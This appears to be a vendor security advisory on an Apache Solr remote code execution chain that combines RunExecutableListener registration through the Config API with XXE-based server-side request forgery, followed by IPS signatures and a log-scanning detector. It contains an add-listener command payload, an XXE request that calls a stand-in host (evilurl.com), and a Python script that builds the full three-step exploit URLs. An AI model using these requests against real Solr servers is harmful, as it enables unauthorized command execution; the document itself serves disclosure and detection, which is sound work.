Apache Solr Remote Code Execution Vulnerability

Apache Solr is an open source distributed search platform built on the Apache Lucene search engine library. A remote code execution vulnerability has been reported in Apache Solr before version 7.1, which allows an attacker to send crafted HTTP requests that execute arbitrary commands on the remote server.

The code execution vulnerability

Solr uses the term "collection" to define a single search index, which is effectively a logical grouping of index data. Search queries are typically sent to Apache Solr as requests to the following URI:

http://[host]:8983/solr/[collection]/select?q=[query]

where [collection] is the name of the collection to query and [query] is a query in any supported query syntax. The request can be sent as an HTTP GET or POST and is handled by Solr's query parsers, which are built on Apache Lucene.

Solr supports event listeners, which trigger actions on various events sent to a collection (for example an update to the collection). An event listener requires an event type and a handler class; the handler class may be a custom class or a built-in one. The built-in "RunExecutableListener" class executes an arbitrary command on a given event, for example after each commit. The problem is that such a listener can be registered with arbitrary parameters by anyone who can reach the Config API (http://[host]:8983/solr/[collection]/config) with an add-listener command:

  POST /solr/newcollection/config HTTP/1.1
  Host: localhost:8983
  Connection: close
  Content-Type: application/json
  Content-Length: 198

  {
    "add-listener" : {
      "event":"postCommit",
      "name":"somelistener",
      "class":"solr.RunExecutableListener",
      "exe":"[command]",            <--- Arbitrary command
      "dir":"solr/bin",             <--- Command path
      "args":["foo","bar"]          <--- Command params
    }
  }

When the postCommit event is triggered, the command runs with the privileges of the Solr server process. Deployments that do not need runtime configuration changes can make the Config API read-only by starting Solr with the disable.configEdit=true system property, which removes this entry point.

The above vulnerability is sufficient on its own for code execution by anyone with direct access to the Solr Config API. To exploit it without direct access to the Solr server, a second vulnerability can be chained: the XML external entity expansion vulnerability.

The XML external entity expansion vulnerability

This vulnerability is caused by the Lucene XML query parser (reached through Solr's xmlparser query parser) not prohibiting DOCTYPE declarations or the expansion of external entities. A query can be crafted that makes Solr issue HTTP requests, including requests to localhost, when it attempts to resolve an external entity, resulting in server-side request forgery.

For example, when Solr handles the following request (shown URL-decoded), its XML parser resolves the external DTD declared in the DOCTYPE and makes an HTTP GET request to evilurl.com:

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://evilurl.com/"><a></a>'}

Because it is the Solr server itself that fetches the external entity, the attacker can point it at http://localhost:8983/ and reach endpoints that are only accessible locally, which turns the code execution vulnerability above into a remote one.

An exploit is already in the wild on exploit-db. A real-world attack consists of 3 parts, each delivered through the XXE as a request to localhost:

  1. Create a new collection, using the XXE vulnerability to call the localhost Collections API. (If a collection name is already known to the attacker, this step can be skipped.)
  2. Register the RunExecutableListener on the collection from step 1 by sending the Config API request through Solr's own distributed-search forwarding. The qt parameter overrides the request handler path and shards=localhost:8983/ makes Solr forward the request to itself as an internal POST, so the JSON carried in stream.body reaches the Config API even though the XXE can only produce a GET:

     http://localhost:8983/solr/[collection]/select?q=foo&qt=/solr/newcollection/config?stream.body=[add-listener JSON from above]&shards=localhost:8983/

  3. Update "newcollection", using the same request format as step 2 with the update handler in place of /config, so that the postCommit event fires and RunExecutableListener executes the command contained in step 2's JSON payload.
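The three requests above, assembled as an added example; this is not code from the original post or from the exploit-db entry, and it only builds request strings, it sends nothing. It assumes Solr on its default port 8983, a known collection named gettingstarted (as in the XXE example above), the SolrCloud Collections API (action=CREATE) for step 1, and for step 3 a one-document JSON update with commit=true, which is what makes the postCommit event fire.

```python
import json
from urllib.parse import urlencode

# Assumption: Solr on its default port, as in the post's requests.
SOLR = "localhost:8983"


def add_listener_body(command, args=(), name="somelistener", directory="solr/bin"):
    """Config API 'add-listener' command from the post: a postCommit listener whose
    class is solr.RunExecutableListener, so every commit runs `command`."""
    listener = {
        "event": "postCommit",
        "name": name,
        "class": "solr.RunExecutableListener",
        "exe": command,
        "dir": directory,
        "args": list(args),
    }
    return json.dumps({"add-listener": listener}, separators=(",", ":"))


def shard_trick_url(collection, handler, body_and_params):
    """GET to /select that Solr forwards to itself as an internal POST.
    qt overrides the request handler path and shards=localhost:8983/ makes the
    shard handler send a distributed request to localhost, so stream.body
    (carried inside the qt value) reaches `handler` as a request body."""
    params = [
        ("q", "foo"),
        ("qt", f"/solr/{collection}{handler}?stream.body={body_and_params}"),
        ("shards", f"{SOLR}/"),
    ]
    return f"http://{SOLR}/solr/{collection}/select?" + urlencode(params)


def xxe_query(target_url):
    """xmlparser query whose DOCTYPE makes Solr's XML parser fetch target_url."""
    return "{!xmlparser v='<!DOCTYPE a SYSTEM \"%s\"><a></a>'}" % target_url


def via_xxe(known_collection, target_url):
    """Wrap target_url so the Solr server itself issues it (the SSRF step).
    urlencode escapes the '&' of the inner URL, so it stays inside q."""
    return f"http://{SOLR}/solr/{known_collection}/select?" + urlencode(
        {"q": xxe_query(target_url)})


def chain(known_collection, new_collection, command, args=()):
    """The three requests of the attack, all sent to the known collection's /select.
    Assumptions beyond the post: step 1 uses SolrCloud's Collections API, step 3
    sends a one-document update with commit=true (the commit fires postCommit)."""
    create = (f"http://{SOLR}/solr/admin/collections?action=CREATE"
              f"&name={new_collection}&numShards=1")
    add = shard_trick_url(new_collection, "/config", add_listener_body(command, args))
    update = shard_trick_url(new_collection, "/update", '[{"id":"1"}]&commit=true')
    return {
        "create_collection": via_xxe(known_collection, create),
        "add_listener": via_xxe(known_collection, add),
        "commit": via_xxe(known_collection, update),
    }


if __name__ == "__main__":
    for step, url in chain("gettingstarted", "newcollection", "/usr/bin/id", ["-u"]).items():
        print(f"{step}:\n  {url}\n")
```

Note the two layers of percent-encoding in the output: the inner request is encoded once when it is built, then the whole xmlparser query is encoded again as the outer q parameter, so the add-listener JSON is only visible after decoding twice. That is what any signature or log search for this chain has to account for.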

The SonicWall Threat Research team has analyzed the vulnerability and developed the following signatures:

  • IPS 13036: Apache Solr Remote Code Execution 1
  • IPS 13037: Apache Solr Remote Code Execution 2
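Detection logic of the kind such signatures encode, as an added example: this is not SonicWall's signature content or implementation and not code from the post. It scans constructed access-log entries (combined log format, not real traffic), percent-decodes each request target repeatedly because the chained payload is encoded at least twice, and flags the indicators described above: an xmlparser query carrying a DOCTYPE, a localhost URL inside the query, the RunExecutableListener / add-listener command, the shards plus qt handler override, and a direct POST to the Config API.

```python
import re
from urllib.parse import unquote_plus

# Request line inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+"')

# The chained request from the post, percent-encoded as it would appear in a
# log: the add-listener JSON sits inside the qt value (encoded once), inside
# the DOCTYPE of the xmlparser query in the outer q parameter (encoded again).
CHAIN_QUERY = (
    "%7B%21xmlparser+v%3D%27%3C%21DOCTYPE+a+SYSTEM+%22"
    "http%3A%2F%2Flocalhost%3A8983%2Fsolr%2Fnewcollection%2Fselect%3Fq%3Dfoo%26qt%3D"
    "%252Fsolr%252Fnewcollection%252Fconfig%253Fstream.body%253D"
    "%257B%2522add-listener%2522%253A%257B%2522class%2522%253A"
    "%2522solr.RunExecutableListener%2522%257D%257D"
    "%26shards%3Dlocalhost%253A8983%252F"
    "%22%3E%3Ca%3E%3C%2Fa%3E%27%7D"
)

# Constructed sample entries, not real traffic: a normal search, the chained
# XXE request, and a direct POST to the Config API.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2018:00:00:01 +0000] "GET /solr/gettingstarted/select?q=title%3Asolr&rows=10 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2018:00:00:02 +0000] "GET /solr/gettingstarted/select?q=' + CHAIN_QUERY + ' HTTP/1.1" 200 91',
    '10.0.0.5 - - [01/Jan/2018:00:00:03 +0000] "POST /solr/newcollection/config HTTP/1.1" 200 40',
]


def fully_decode(text, max_rounds=5):
    """Percent-decode until the text stops changing. A single decode of the
    chained request still hides the JSON behind a second layer of encoding."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def indicators(method, target):
    """Indicators from the post, checked on the fully decoded request target."""
    t = fully_decode(target).lower()
    hits = []
    if "!xmlparser" in t and ("<!doctype" in t or "<!entity" in t):
        hits.append("xmlparser-doctype")            # XXE via the xmlparser query parser
    if "http://localhost" in t or "http://127.0.0.1" in t:
        hits.append("localhost-url-in-query")       # SSRF target is the server itself
    if "runexecutablelistener" in t or "add-listener" in t:
        hits.append("run-executable-listener")      # Config API command registering the listener
    if "shards=" in t and "qt=" in t and ("/config" in t or "/update" in t):
        hits.append("shards-qt-handler-override")   # GET turned into an internal POST
    if method == "POST" and re.search(r"/solr/[^/]+/config(\?|$)", t):
        hits.append("config-api-write")             # body is not logged; inspect it at the proxy/IPS
    return hits


def scan_log(lines):
    """Return (line number, indicators) for each entry that matches anything."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = indicators(match.group(1), match.group(2))
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The direct Config API POST is the weak case: an access log records only the request line, so the add-listener JSON in the body is invisible there and that entry is flagged only as a configuration write. Catching the listener class in the body requires inspection where the body is available, at a reverse proxy, WAF or IPS, which is the position the signatures above occupy.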